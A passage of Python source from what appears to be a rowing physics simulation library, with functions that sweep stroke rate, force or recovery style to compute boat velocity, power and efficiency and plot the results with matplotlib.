RIM_E5[i] = res[10]
calctime = time.time()-tm
[min1,sec1] = rowingphysics.vavgto500mtime(velocity1)
[min2,sec2] = rowingphysics.vavgto500mtime(velocity2)
[min3,sec3] = rowingphysics.vavgto500mtime(velocity3)
[min4,sec4] = rowingphysics.vavgto500mtime(velocity4)
[min5,sec5] = rowingphysics.vavgto500mtime(velocity5)
sec1 = sec1+(min1-1)*60.
sec2 = sec2+(min2-1)*60.
sec3 = sec3+(min3-1)*60.
sec4 = sec4+(min4-1)*60.
sec5 = sec5+(min5-1)*60.
catchangles = 180*catchangles/pi
# plotjes
try:
pyplot.clf
if (doplot == 1):
pyplot.plot (power1,velocity1,'go',label='T1 ')
pyplot.plot (power2,velocity2,'rs',label='T2 ')
pyplot.plot (power3,velocity3,'bv',label='T3 ')
pyplot.plot (power4,velocity4,'k^',label='T4 ')
pyplot.plot (power5,velocity5,'mo',label='T5 ')
pylab.legend(loc='best')
pyplot.xlabel("Power (W)")
pyplot.ylabel('Velocity (m/s)')
if (doplot == 2):
pyplot.plot (catchangles,velocity1,'-g',label='T1')
pyplot.plot (catchangles,velocity2,'-r',label='T2')
pyplot.plot (catchangles,velocity3,'-b',label='T3')
pyplot.plot (catchangles,velocity4,'-k',label='T4')
pyplot.plot (catchangles,velocity5,'-m',label='T5')
pylab.legend(loc='best')
pyplot.xlabel("angle (spm)")
pyplot.ylabel('Velocity (m/s)')
if (doplot == 3):
pyplot.plot (catchangles,power1,'-g',label='T1')
pyplot.plot (catchangles,power2,'-r',label='T2')
pyplot.plot (catchangles,power3,'-b',label='T3')
pyplot.plot (catchangles,power4,'-k',label='T4')
pyplot.plot (catchangles,power5,'-m',label='T5')
pylab.legend(loc='best')
pyplot.xlabel("angle (spm)")
pyplot.ylabel('Power (W)')
if (doplot == 4):
pyplot.plot (power1,sec1,'-g',label='T1')
pyplot.plot (power2,sec2,'-r',label='T2')
pyplot.plot (power4,sec3,'-b',label='T3')
pyplot.plot (power3,sec4,'-k',label='T4')
pyplot.plot (power3,sec5,'-m',label='T5')
pylab.legend(loc='best')
pyplot.xlabel("Power (W)")
pyplot.ylabel('500m time')
if (doplot == 5):
pyplot.plot (check1,velocity1,'go',label='T1 ')
pyplot.plot (check2,velocity2,'rs',label='T2 ')
pyplot.plot (check3,velocity3,'bv',label='T3 ')
pyplot.plot (check4,velocity4,'k^',label='T4 ')
pyplot.plot (check5,velocity5,'mo',label='T5 ')
pylab.legend(loc='best')
pyplot.xlabel("Check (m2/s4)")
pyplot.ylabel('Velocity (m/s)')
if (doplot == 6):
pyplot.plot (catchangles,check1,'go',label='T1')
pyplot.plot (catchangles,check2,'rs',label='T2')
pyplot.plot (catchangles,check3,'bv',label='T3')
pyplot.plot (catchangles,check4,'k^',label='T4')
pyplot.plot (catchangles,check5,'mo',label='T5')
pylab.legend(loc='best')
pyplot.xlabel("angle (spm)")
pyplot.ylabel('Crewnerd Check (m2/s4)')
if (doplot == 7):
pyplot.plot (RIM_check1,velocity1,'-go',label='T1')
pyplot.plot (RIM_check2,velocity2,'-rs',label='T2')
pyplot.plot (RIM_check3,velocity3,'-bv',label='T3')
pyplot.plot (RIM_check4,velocity4,'-k^',label='T4')
pyplot.plot (RIM_check5,velocity5,'-mo',label='T5')
pylab.legend(loc='best')
pyplot.ylabel("velocity (m/s)")
pyplot.xlabel('RIM Check (m/s)')
if (doplot == 8):
pyplot.plot (RIM_E1,velocity1,'go',label='T1')
pyplot.plot (RIM_E2,velocity2,'rs',label='T2')
pyplot.plot (RIM_E3,velocity3,'bv',label='T3')
pyplot.plot (RIM_E4,velocity4,'k^',label='T4')
pyplot.plot (RIM_E5,velocity5,'mo',label='T5')
pylab.legend(loc='best')
pyplot.ylabel("velocity (m/s)")
pyplot.xlabel('RIM Stroke Efficiency (m)')
pyplot.show()
except NameError:
print("No plotting today")
return calctime
def styleseriesRIM(tempomin,tempomax,F,crew,rigging,
aantal=30,timestep=0.03,doplot=1,timewise=0):
""" Various plots for different stroke rates and rowing styles
"""
from .crew import flat,strongmiddle,strongmiddle2,strongend,strongbegin,trapezium
tm = time.time()
tempos = linspace(tempomin,tempomax,aantal)
velocity1 = zeros(aantal)
power1 = zeros(aantal)
ratios1=zeros(aantal)
energies1=zeros(aantal)
check1=zeros(aantal)
RIM_check1 = zeros(aantal)
RIM_E1 = zeros(aantal)
efficiencies1 = zeros(aantal)
RIM_effs1 = zeros(aantal)
crew.strokeprofile = strongmiddle2(frac=-0.5) # fitted
for i in range(len(tempos)):
dv = 1
vend = 4
crew.tempo = tempos[i]
catchacceler = 5.0
while (dv/vend > 0.001):
res = rowingphysics.energybalance(F,crew,rigging,vend,timestep,0,
timewise=timewise,
catchacceler=catchacceler)
dv = res[0]
vend = res[1]
catchacceler = res[14]
print(catchacceler)
res = rowingphysics.stroke(F,crew,rigging,vend,timestep,10,
timewise=timewise,
catchacceler=catchacceler)
velocity1[i] = res[2]
ratios1[i] = res[3]
energies1[i] = res[4]
power1[i] = res[5]
efficiencies1[i] = res[6]
RIM_effs1[i] = res[15]
check1[i] = res[9]
RIM_check1[i] = res[11]
RIM_E1[i] = res[10]
velocity2 = zeros(aantal)
power2 = zeros(aantal)
ratios2=zeros(aantal)
energies2=zeros(aantal)
check2=zeros(aantal)
RIM_check2 = zeros(aantal)
RIM_E2 = zeros(aantal)
efficiencies2 = zeros(aantal)
RIM_effs2 = zeros(aantal)
crew.strokeprofile = strongmiddle2(frac=0) # fitted
for i in range(len(tempos)):
dv = 1
vend = 4
crew.tempo = tempos[i]
catchacceler = 5.0
while (dv/vend > 0.001):
res = rowingphysics.energybalance(F,crew,rigging,vend,timestep,0,
timewise=timewise,
catchacceler=catchacceler)
dv = res[0]
vend = res[1]
catchacceler = res[14]
res = rowingphysics.stroke(F,crew,rigging,vend,timestep,10,
timewise=timewise,
catchacceler=catchacceler)
velocity2[i] = res[2]
ratios2[i] = res[3]
energies2[i] = res[4]
power2[i] = res[5]
efficiencies2[i] = res[6]
RIM_effs2[i] = res[15]
check2[i] = res[9]
RIM_check2[i] = res[11]
RIM_E2[i] = res[10]
# print(tempos[i],power2[i],velocity2[i],RIM_effs2[i]
velocity3 = zeros(aantal)
power3 = zeros(aantal)
ratios3=zeros(aantal)
energies3=zeros(aantal)
check3=zeros(aantal)
RIM_check3 = zeros(aantal)
RIM_E3 = zeros(aantal)
efficiencies3 = zeros(aantal)
RIM_effs3 = zeros(aantal)
crew.strokeprofile = strongmiddle2(frac=0.5) # fitted
for i in range(len(tempos)):
dv = 1
vend = 4
crew.tempo = tempos[i]
catchacceler = 5.0
while (dv/vend > 0.001):
res = rowingphysics.energybalance(F,crew,rigging,vend,timestep,0,
timewise=timewise,
catchacceler=catchacceler)
dv = res[0]
vend = res[1]
catchacceler = res[14]
res = rowingphysics.stroke(F,crew,rigging,vend,timestep,10,
timewise=timewise,
catchacceler=catchacceler)
velocity3[i] = res[2]
ratios3[i] = res[3]
energies3[i] = res[4]
power3[i] = res[5]
efficiencies3[i] = res[6]
RIM_effs3[i] = res[15]
check3[i] = res[9]
RIM_check3[i] = res[11]
RIM_E3[i] = res[10]
# print(tempos[i],power3[i],velocity3[i],RIM_effs3[i]
velocity4 = zeros(aantal)
power4 = zeros(aantal)
ratios4=zeros(aantal)
energies4=zeros(aantal)
check4=zeros(aantal)
RIM_check4=zeros(aantal)
RIM_E4=zeros(aantal)
efficiencies4 = zeros(aantal)
RIM_effs4 = zeros(aantal)
crew.strokeprofile = strongmiddle2(frac=1.0) # fitted
for i in range(len(tempos)):
dv = 1
vend = 4
crew.tempo = tempos[i]
catchacceler = 5.0
while (dv/vend > 0.001):
res = rowingphysics.energybalance(F,crew,rigging,vend,timestep,0,
timewise=timewise,
catchacceler=catchacceler)
dv = res[0]
vend = res[1]
catchacceler = res[14]
res = rowingphysics.stroke(F,crew,rigging,vend,timestep,10,
timewise=timewise,
catchacceler=catchacceler)
velocity4[i] = res[2]
ratios4[i] = res[3]
energies4[i] = res[4]
power4[i] = res[5]
efficiencies4[i] = res[6]
RIM_effs4[i] = res[15]
check4[i] = res[9]
RIM_check4[i] = res[11]
RIM_E4[i] = res[10]
velocity5 = zeros(aantal)
power5 = zeros(aantal)
ratios5=zeros(aantal)
energies5=zeros(aantal)
check5=zeros(aantal)
RIM_check5 = zeros(aantal)
RIM_E5 = zeros(aantal)
efficiencies5 = zeros(aantal)
RIM_effs5 = zeros(aantal)
crew.strokeprofile = trapezium()
for i in range(len(tempos)):
dv = 1
vend = 4
crew.tempo = tempos[i]
catchacceler = 5.0
while (dv/vend > 0.001):
res = rowingphysics.energybalance(F,crew,rigging,vend,timestep,0,
timewise=timewise,
catchacceler=catchacceler)
dv = res[0]
vend = res[1]
catchacceler = res[14]
res = rowingphysics.stroke(F,crew,rigging,vend,timestep,10,
timewise=timewise,
catchacceler=catchacceler)
velocity5[i] = res[2]
ratios5[i] = res[3]
energies5[i] = res[4]
power5[i] = res[5]
efficiencies5[i] = res[6]
RIM_effs5[i] = res[15]
check5[i] = res[9]
RIM_check5[i] = res[11]
RIM_E5[i] = res[10]
calctime = time.time()-tm
[min1,sec1] = rowingphysics.vavgto500mtime(velocity1)
[min2,sec2] = rowingphysics.vavgto500mtime(velocity2)
[min3,sec3] = rowingphysics.vavgto500mtime(velocity3)
[min4,sec4] = rowingphysics.vavgto500mtime(velocity4)
[min5,sec5] = rowingphysics.vavgto500mtime(velocity5)
sec1 = sec1+(min1-1)*60.
sec2 = sec2+(min2-1)*60.
sec3 = sec3+(min3-1)*60.
sec4 = sec4+(min4-1)*60.
sec5 = sec5+(min5-1)*60.
# plotjes
try:
pyplot.clf
if (doplot == 1):
pyplot.plot (power1,velocity1,'go',label='T1 ')
pyplot.plot (power2,velocity2,'rs',label='T2 ')
pyplot.plot (power3,velocity3,'bv',label='T3 ')
pyplot.plot (power4,velocity4,'k^',label='T4 ')
pyplot.plot (power5,velocity5,'mo',label='T5 ')
pylab.legend(loc='best')
pyplot.xlabel("Power (W)")
pyplot.ylabel('Velocity (m/s)')
if (doplot == 2):
pyplot.plot (tempos,velocity1,'-g',label='T1')
pyplot.plot (tempos,velocity2,'-r',label='T2')
pyplot.plot (tempos,velocity3,'-b',label='T3')
pyplot.plot (tempos,velocity4,'-k',label='T4')
pyplot.plot (tempos,velocity5,'-m',label='T5')
pylab.legend(loc='best')
pyplot.xlabel("tempo (spm)")
pyplot.ylabel('Velocity (m/s)')
if (doplot == 3):
pyplot.plot (tempos,power1,'-g',label='T1')
pyplot.plot (tempos,power2,'-r',label='T2')
pyplot.plot (tempos,power3,'-b',label='T3')
pyplot.plot (tempos,power4,'-k',label='T4')
pyplot.plot (tempos,power5,'-m',label='T5')
pylab.legend(loc='best')
pyplot.xlabel("tempo (spm)")
pyplot.ylabel('Power (W)')
if (doplot == 4):
pyplot.plot (power1,sec1,'-g',label='T1')
pyplot.plot (power2,sec2,'-r',label='T2')
pyplot.plot (power4,sec3,'-b',label='T3')
pyplot.plot (power3,sec4,'-k',label='T4')
pyplot.plot (power3,sec5,'-m',label='T5')
pylab.legend(loc='best')
pyplot.xlabel("Power (W)")
pyplot.ylabel('500m time')
if (doplot == 5):
pyplot.plot (check1,velocity1,'go',label='T1 ')
pyplot.plot (check2,velocity2,'rs',label='T2 ')
pyplot.plot (check3,velocity3,'bv',label='T3 ')
pyplot.plot (check4,velocity4,'k^',label='T4 ')
pyplot.plot (check5,velocity5,'mo',label='T5 ')
pylab.legend(loc='best')
pyplot.xlabel("Check (m2/s4)")
pyplot.ylabel('Velocity (m/s)')
if (doplot == 6):
pyplot.plot (tempos,check1,'go',label='T1')
pyplot.plot (tempos,check2,'rs',label='T2')
pyplot.plot (tempos,check3,'bv',label='T3')
pyplot.plot (tempos,check4,'k^',label='T4')
pyplot.plot (tempos,check5,'mo',label='T5')
pylab.legend(loc='best')
pyplot.xlabel("tempo (spm)")
pyplot.ylabel('Crewnerd Check (m2/s4)')
if (doplot == 7):
pyplot.plot (RIM_check1,velocity1,'-go',label='T1')
pyplot.plot (RIM_check2,velocity2,'-rs',label='T2')
pyplot.plot (RIM_check3,velocity3,'-bv',label='T3')
pyplot.plot (RIM_check4,velocity4,'-k^',label='T4')
pyplot.plot (RIM_check5,velocity5,'-mo',label='T5')
pylab.legend(loc='best')
pyplot.ylabel("velocity (m/s)")
pyplot.xlabel('RIM Check (m/s)')
if (doplot == 8):
pyplot.plot (RIM_E1,velocity1,'go',label='T1')
pyplot.plot (RIM_E2,velocity2,'rs',label='T2')
pyplot.plot (RIM_E3,velocity3,'bv',label='T3')
pyplot.plot (RIM_E4,velocity4,'k^',label='T4')
pyplot.plot (RIM_E5,velocity5,'mo',label='T5')
pylab.legend(loc='best')
pyplot.ylabel("velocity (m/s)")
pyplot.xlabel('RIM Stroke Efficiency (m)')
if (doplot == 9):
pyplot.plot (RIM_effs1,velocity1,'go',label='T1')
pyplot.plot (RIM_effs2,velocity2,'rs',label='T2')
pyplot.plot (RIM_effs3,velocity3,'bv',label='T3')
pyplot.plot (RIM_effs4,velocity4,'k^',label='T4')
pyplot.plot (RIM_effs5,velocity5,'mo',label='T5')
pylab.legend(loc='best')
pyplot.ylabel("velocity (m/s)")
pyplot.xlabel('Fluid Drag Efficiency')
if (doplot == 10):
pyplot.plot (efficiencies1,velocity1,'go',label='T1')
pyplot.plot (efficiencies2,velocity2,'rs',label='T2')
pyplot.plot (efficiencies3,velocity3,'bv',label='T3')
pyplot.plot (efficiencies4,velocity4,'k^',label='T4')
pyplot.plot (efficiencies5,velocity5,'mo',label='T5')
pylab.legend(loc='best')
pyplot.ylabel("velocity (m/s)")
pyplot.xlabel('Efficiency')
pyplot.show()
except NameError:
print("No plotting today")
return calctime
def styleseriesforce(Fmin,Fmax,crew,rigging,
aantal=30,timestep=0.03,doplot=1,timewise=0):
""" Plots various plots for varying forces
"""
from .crew import flat,strongmiddle,strongend,strongbegin,trapezium
tm = time.time()
Forces = linspace(Fmin,Fmax,aantal)
velocity1 = zeros(aantal)
power1 = zeros(aantal)
ratios1=zeros(aantal)
energies1=zeros(aantal)
check1=zeros(aantal)
RIM_check1 = zeros(aantal)
RIM_E1 = zeros(aantal)
crew.strokeprofile = trapezium(x1=0.1,h2=0.5) # flat()
for i in range(len(Forces)):
dv = 1
vend = 4
catchacceler = 5.0
while (dv/vend > 0.001):
res = rowingphysics.energybalance(Forces[i],crew,rigging,vend,timestep,0,
timewise=timewise,
catchacceler=catchacceler)
dv = res[0]
vend = res[1]
catchacceler = res[14]
res = rowingphysics.stroke(Forces[i],crew,rigging,vend,timestep,10,
timewise=timewise,
catchacceler=catchacceler)
velocity1[i] = res[2]
ratios1[i] = res[3]
energies1[i] = res[4]
power1[i] = res[5]
check1[i] = res[9]
RIM_check1[i] = res[11]
RIM_E1[i] = res[10]
velocity2 = zeros(aantal)
power2 = zeros(aantal)
ratios2=zeros(aantal)
energies2=zeros(aantal)
check2=zeros(aantal)
RIM_check2 = zeros(aantal)
RIM_E2 = zeros(aantal)
crew.strokeprofile = trapezium(x1=0.1,h2=0.75) # strongbegin()
for i in range(len(Forces)):
dv = 1
vend = 4
catchacceler = 5.0
while (dv/vend > 0.001):
res = rowingphysics.energybalance(Forces[i],crew,rigging,vend,timestep,0,
timewise=timewise,
catchacceler=catchacceler)
dv = res[0]
vend = res[1]
catchacceler = res[14]
res = rowingphysics.stroke(Forces[i],crew,rigging,vend,timestep,10,
timewise=timewise,
catchacceler=catchacceler)
velocity2[i] = res[2]
ratios2[i] = res[3]
energies2[i] = res[4]
power2[i] = res[5]
check2[i] = res[9]
RIM_check2[i] = res[11]
RIM_E2[i] = res[10]
velocity3 = zeros(aantal)
power3 = zeros(aantal)
ratios3=zeros(aantal)
energies3=zeros(aantal)
check3=zeros(aantal)
RIM_check3 = zeros(aantal)
RIM_E3 = zeros(aantal)
crew.strokeprofile = trapezium(x1=0.1,x2=0.5,h2=0.75) # strongend()
for i in range(len(Forces)):
dv = 1
vend = 4
catchacceler = 5.0
while (dv/vend > 0.001):
res = rowingphysics.energybalance(Forces[i],crew,rigging,vend,timestep,0,
timewise=timewise,
catchacceler=catchacceler)
dv = res[0]
vend = res[1]
catchacceler = res[14]
res = rowingphysics.stroke(Forces[i],crew,rigging,vend,timestep,10,
timewise=timewise,
catchacceler=catchacceler)
velocity3[i] = res[2]
ratios3[i] = res[3]
energies3[i] = res[4]
power3[i] = res[5]
check3[i] = res[9]
RIM_check3[i] = res[11]
RIM_E3[i] = res[10]
velocity4 = zeros(aantal)
power4 = zeros(aantal)
ratios4=zeros(aantal)
energies4=zeros(aantal)
check4=zeros(aantal)
RIM_check4=zeros(aantal)
RIM_E4=zeros(aantal)
crew.strokeprofile = trapezium(x1=0.15,x2=0.5,h2=0.9) # trapezium()
for i in range(len(Forces)):
dv = 1
vend = 4
catchacceler = 5.0
while (dv/vend > 0.001):
res = rowingphysics.energybalance(Forces[i],crew,rigging,vend,timestep,0,
timewise=timewise,
catchacceler=catchacceler)
dv = res[0]
vend = res[1]
catchacceler = res[14]
res = rowingphysics.stroke(Forces[i],crew,rigging,vend,timestep,10,
timewise=timewise,
catchacceler=catchacceler)
velocity4[i] = res[2]
ratios4[i] = res[3]
energies4[i] = res[4]
power4[i] = res[5]
check4[i] = res[9]
RIM_check4[i] = res[11]
RIM_E4[i] = res[10]
velocity5 = zeros(aantal)
power5 = zeros(aantal)
ratios5=zeros(aantal)
energies5=zeros(aantal)
check5=zeros(aantal)
RIM_check5 = zeros(aantal)
RIM_E5 = zeros(aantal)
crew.strokeprofile = trapezium()
for i in range(len(Forces)):
dv = 1
vend = 4
catchacceler = 5.0
while (dv/vend > 0.001):
res = rowingphysics.energybalance(Forces[i],crew,rigging,vend,timestep,0,
timewise=timewise,
catchacceler=catchacceler)
dv = res[0]
vend = res[1]
catchacceler = res[14]
res = rowingphysics.stroke(Forces[i],crew,rigging,vend,timestep,10,
timewise=timewise,
catchacceler=catchacceler)
velocity5[i] = res[2]
ratios5[i] = res[3]
energies5[i] = res[4]
power5[i] = res[5]
check5[i] = res[9]
RIM_check5[i] = res[11]
RIM_E5[i] = res[10]
calctime = time.time()-tm
[min1,sec1] = rowingphysics.vavgto500mtime(velocity1)
[min2,sec2] = rowingphysics.vavgto500mtime(velocity2)
[min3,sec3] = rowingphysics.vavgto500mtime(velocity3)
[min4,sec4] = rowingphysics.vavgto500mtime(velocity4)
[min5,sec5] = rowingphysics.vavgto500mtime(velocity5)
sec1 = sec1+(min1-1)*60.
sec2 = sec2+(min2-1)*60.
sec3 = sec3+(min3-1)*60.
sec4 = sec4+(min4-1)*60.
sec5 = sec5+(min5-1)*60.
# plotjes
try:
pyplot.clf
if (doplot == 1):
pyplot.plot (power1,velocity1,'go',label='T1 ')
pyplot.plot (power2,velocity2,'rs',label='T2 ')
pyplot.plot (power3,velocity3,'bv',label='T3 ')
pyplot.plot (power4,velocity4,'k^',label='T4 ')
pyplot.plot (power5,velocity5,'mo',label='T5 ')
pylab.legend(loc='best')
pyplot.xlabel("Power (W)")
pyplot.ylabel('Velocity (m/s)')
if (doplot == 2):
pyplot.plot (Forces,velocity1,'-g',label='T1')
pyplot.plot (Forces,velocity2,'-r',label='T2')
pyplot.plot (Forces,velocity3,'-b',label='T3')
pyplot.plot (Forces,velocity4,'-k',label='T4')
pyplot.plot (Forces,velocity5,'-m',label='T5')
pylab.legend(loc='best')
pyplot.xlabel("Force (N)")
pyplot.ylabel('Velocity (m/s)')
if (doplot == 3):
pyplot.plot (Forces,power1,'-g',label='T1')
pyplot.plot (Forces,power2,'-r',label='T2')
pyplot.plot (Forces,power3,'-b',label='T3')
pyplot.plot (Forces,power4,'-k',label='T4')
pyplot.plot (Forces,power5,'-m',label='T5')
pylab.legend(loc='best')
pyplot.xlabel("Force (N)")
pyplot.ylabel('Power (W)')
if (doplot == 4):
pyplot.plot (power1,sec1,'-g',label='T1')
pyplot.plot (power2,sec2,'-r',label='T2')
pyplot.plot (power4,sec3,'-b',label='T3')
pyplot.plot (power3,sec4,'-k',label='T4')
pyplot.plot (power3,sec5,'-m',label='T5')
pylab.legend(loc='best')
pyplot.xlabel("Power (W)")
pyplot.ylabel('500m time')
if (doplot == 5):
pyplot.plot (check1,velocity1,'go',label='T1 ')
pyplot.plot (check2,velocity2,'rs',label='T2 ')
pyplot.plot (check3,velocity3,'bv',label='T3 ')
pyplot.plot (check4,velocity4,'k^',label='T4 ')
pyplot.plot (check5,velocity5,'mo',label='T5 ')
pylab.legend(loc='best')
pyplot.xlabel("Check (m2/s4)")
pyplot.ylabel('Velocity (m/s)')
if (doplot == 6):
pyplot.plot (Forces,check1,'go',label='T1')
pyplot.plot (Forces,check2,'rs',label='T2')
pyplot.plot (Forces,check3,'bv',label='T3')
pyplot.plot (Forces,check4,'k^',label='T4')
pyplot.plot (Forces,check5,'mo',label='T5')
pylab.legend(loc='best')
pyplot.xlabel("Force (N)")
pyplot.ylabel('Crewnerd Check (m2/s4)')
if (doplot == 7):
pyplot.plot (RIM_check1,velocity1,'-go',label='T1')
pyplot.plot (RIM_check2,velocity2,'-rs',label='T2')
pyplot.plot (RIM_check3,velocity3,'-bv',label='T3')
pyplot.plot (RIM_check4,velocity4,'-k^',label='T4')
pyplot.plot (RIM_check5,velocity5,'-mo',label='T5')
pylab.legend(loc='best')
pyplot.ylabel("velocity (m/s)")
pyplot.xlabel('RIM Check (m/s)')
if (doplot == 8):
pyplot.plot (RIM_E1,velocity1,'go',label='T1')
pyplot.plot (RIM_E2,velocity2,'rs',label='T2')
pyplot.plot (RIM_E3,velocity3,'bv',label='T3')
pyplot.plot (RIM_E4,velocity4,'k^',label='T4')
pyplot.plot (RIM_E5,velocity5,'mo',label='T5')
pylab.legend(loc='best')
pyplot.ylabel("velocity (m/s)")
pyplot.xlabel('RIM Stroke Efficiency (m)')
pyplot.show()
except NameError:
print("No plotting today")
return calctime
def recoverystyleseries(tempomin,tempomax,F,crew,rigging,
aantal=30,timestep=0.03,doplot=1,timewise=0):
""" Various plots with varying recovery style
"""
from .crew import flatrecovery,sinusrecovery,trianglerecovery,realisticrecovery
tm = time.time()
tempos = linspace(tempomin,tempomax,aantal)
velocity1 = zeros(aantal)
power1 = zeros(aantal)
ratios1=zeros(aantal)
energies1=zeros(aantal)
check1=zeros(aantal)
RIM_check1 = zeros(aantal)
RIM_E1 = zeros(aantal)
crew.recprofile = flatrecovery()
for i in range(len(tempos)):
dv = 1
vend = 4
crew.tempo = tempos[i]
catchacceler = 5.0
while (dv/vend > 0.001):
res = rowingphysics.energybalance(F,crew,rigging,vend,timestep,0,
timewise=timewise,
catchacceler=catchacceler)
dv = res[0]
vend = res[1]
catchacceler = res[14]
res = rowingphysics.stroke(F,crew,rigging,vend,timestep,10,
timewise=timewise,
catchacceler=catchacceler)
velocity1[i] = res[2]
ratios1[i] = res[3]
energies1[i] = res[4]
power1[i] = res[5]
check1[i] = res[9]
RIM_check1[i] = res[11]
RIM_E1[i] = res[10]
velocity2 = zeros(aantal)
power2 = zeros(aantal)
ratios2=zeros(aantal)
energies2=zeros(aantal)
check2=zeros(aantal)
RIM_check2 = zeros(aantal)
RIM_E2 = zeros(aantal)
crew.recprofile = sinusrecovery()
for i in range(len(tempos)):
dv = 1
vend = 4
crew.tempo = tempos[i]
catchacceler = 5.0
while (dv/vend > 0.001):
res = rowingphysics.energybalance(F,crew,rigging,vend,timestep,0,
timewise=timewise,
catchacceler=catchacceler)
dv = res[0]
vend = res[1]
catchacceler = res[14]
res = rowingphysics.stroke(F,crew,rigging,vend,timestep,10,
timewise=timewise,
catchacceler=catchacceler)
velocity2[i] = res[2]
ratios2[i] = res[3]
energies2[i] = res[4]
power2[i] = res[5]
check2[i] = res[9]
RIM_check2[i] = res[11]
RIM_E2[i] = res[10]
velocity3 = zeros(aantal)
power3 = zeros(aantal)
ratios3=zeros(aantal)
energies3=zeros(aantal)
check3=zeros(aantal)
RIM_check3 = zeros(aantal)
RIM_E3 = zeros(aantal)
crew.recprofile = trianglerecovery()
for i in range(len(tempos)):
dv = 1
vend = 4
crew.tempo = tempos[i]
catchacceler = 5.0
while (dv/vend > 0.001):
res = rowingphysics.energybalance(F,crew,rigging,vend,timestep,0,
timewise=timewise,
catchacceler=catchacceler)
dv = res[0]
vend = res[1]
catchacceler = res[14]
res = rowingphysics.stroke(F,crew,rigging,vend,timestep,10,
timewise=timewise,
catchacceler=catchacceler)
velocity3[i] = res[2]
ratios3[i] = res[3]
energies3[i] = res[4]
power3[i] = res[5]
check3[i] = res[9]
RIM_check3[i] = res[11]
RIM_E3[i] = res[10]
velocity4 = zeros(aantal)
power4 = zeros(aantal)
ratios4=zeros(aantal)
energies4=zeros(aantal)
check4=zeros(aantal)
RIM_check4 = zeros(aantal)
RIM_E4 = zeros(aantal)
crew.recprofile = realisticrecovery()
for i in range(len(tempos)):
dv = 1
vend = 4
crew.tempo = tempos[i]
catchacceler = 5.0
while (dv/vend > 0.001):
res = rowingphysics.energybalance(F,crew,rigging,vend,timestep,0,
timewise=timewise,
catchacceler=catchacceler)
dv = res[0]
vend = res[1]
catchacceler = res[14]
res = rowingphysics.stroke(F,crew,rigging,vend,timestep,10,
timewise=timewise,
catchacceler=catchacceler)
velocity4[i] = res[2]
ratios4[i] = res[3]
energies4[i] = res[4]
power4[i] = res[5]
check4[i] = res[9]
RIM_check4[i] = res[11]
RIM_E4[i] = res[10]
calctime = time.time()-tm
[min1,sec1] = rowingphysics.vavgto500mtime(velocity1)
[min2,sec2] = rowingphysics.vavgto500mtime(velocity2)
[min3,sec3] = rowingphysics.vavgto500mtime(velocity3)
[min4,sec4] = rowingphysics.vavgto500mtime(velocity4)
sec1 = sec1+(min1-1)*60.
sec2 = sec2+(min2-1)*60.
sec3 = sec3+(min3-1)*60.
sec4 = sec4+(min4-1)*60.
# plotjes
try:
pyplot.clf
if (doplot==1):
pyplot.plot (power1,velocity1,'-g',label='constant ')
pyplot.plot (power2,velocity2,'-r',label='sinus ')
pyplot.plot (power3,velocity3,'-b',label='triangle ')
pyplot.plot (power4,velocity4,'-k',label='realistic ')
pylab.legend(loc='best')
pyplot.xlabel("Power (W)")
pyplot.ylabel('Velocity (m/s)')
if (doplot==2):
pyplot.plot (tempos,velocity1,'-g',label='constant')
pyplot.plot (tempos,velocity2,'-r',label='sinus')
pyplot.plot (tempos,velocity3,'-b',label='triangle')
pyplot.plot (tempos,velocity4,'-k',label='realistic')
pylab.legend(loc='best')
pyplot.xlabel("tempo (spm)")
pyplot.ylabel('Velocity (m/s)')
if (doplot==3):
pyplot.plot (tempos,power1,'-g',label='constant ')
pyplot.plot (tempos,power2,'-r',label='sinus ')
pyplot.plot (tempos,power3,'-b',label='triangle ')
pyplot.plot (tempos,power4,'-k',label='realistic ')
pylab.legend(loc='best')
pyplot.xlabel("tempo (spm)")
pyplot.ylabel('Power (W)')
if (doplot==4):
pyplot.plot (power1,sec1,'-g',label='constant')
pyplot.plot (power2,sec2,'-r',label='sinus')
pyplot.plot (power3,sec3,'-b',label='triangle')
pyplot.plot (power4,sec4,'-k',label='realistic')
pylab.legend(loc='best')
pyplot.xlabel("Power (W)")
pyplot.ylabel('500m time')
if (doplot==5):
pyplot.plot (check1,velocity1,'-g',label='constant')
pyplot.plot (check2,velocity2,'-r',label='sinus')
pyplot.plot (check3,velocity3,'-b',label='triangle')
pyplot.plot (check4,velocity4,'-k',label='realistic')
pylab.legend(loc='best')
pyplot.xlabel("Check (m2/s4)")
pyplot.ylabel('Velocity (m/s)')
if (doplot == 6):
pyplot.plot (RIM_check1,velocity1,'-g',label='constant')
pyplot.plot (RIM_check2,velocity2,'-r',label='sinus')
pyplot.plot (RIM_check3,velocity3,'-b',label='triangle')
pyplot.plot (RIM_check4,velocity4,'-k',label='realistic')
pylab.legend(loc='best')
pyplot.ylabel("velocity (m/s)")
pyplot.xlabel('RIM Check (m/s)')
if (doplot == 7):
pyplot.plot (RIM_E1,velocity1,'-g',label='constant')
pyplot.plot (RIM_E2,velocity2,'-r',label='sinus')
pyplot.plot (RIM_E3,velocity3,'-b',label='triangle')
pyplot.plot (RIM_E4,velocity4,'-k',label='realistic')
pylab.legend(loc='best')
pyplot.ylabel("velocity (m/s)")
pyplot.xlabel('RIM Stroke Efficiency (m)')
if (doplot == 8):
pyplot.plot (ratios1,velocity1,'-g',label='constant')
pyplot.plot (ratios2,velocity2,'-r',label='sinus')
pyplot.plot (ratios3,velocity3,'-b',label='triangle')
pyplot.plot (ratios4,velocity4,'-k',label='realistic')
pylab.legend(loc='best')
pyplot.ylabel("velocity (m/s)")
pyplot.xlabel('Stroke/Recovery Ratio')
pyplot.show()
except NameError:
print("No plotting today")
return calctime
def recoverystyletriangle(tempomin,tempomax,F,crew,rigging,aantal=30,timestep=0.03,doplot=1,timewise=0):
from .crew import flatrecovery,sinusrecovery,trianglerecovery,realisticrecovery
tm = time.time()
tempos = linspace(tempomin,tempomax,aantal)
velocity1 = zeros(aantal)
power1 = zeros(aantal)
ratios1=zeros(aantal)
energies1=zeros(aantal)
check1=zeros(aantal)
RIM_check1 = zeros(aantal)
RIM_E1 = zeros(aantal)
crew.recprofile = trianglerecovery(0.1)
for i in range(len(tempos)):
dv = 1
vend = 4
crew.tempo = tempos[i]
catchacceler = 5.0
while (dv/vend > 0.001):
res = rowingphysics.energybalance(F,crew,rigging,vend,timestep,0,
timewise=timewise,
catchacceler=catchacceler)
dv = res[0]
vend = res[1]
catchacceler = res[14]
res = rowingphysics.stroke(F,crew,rigging,vend,timestep,10,
timewise=timewise,
catchacceler=catchacceler)
velocity1[i] = res[2]
ratios1[i] = res[3]
energies1[i] = res[4]
power1[i] = res[5]
check1[i] = res[9]
RIM_check1[i] = res[11]
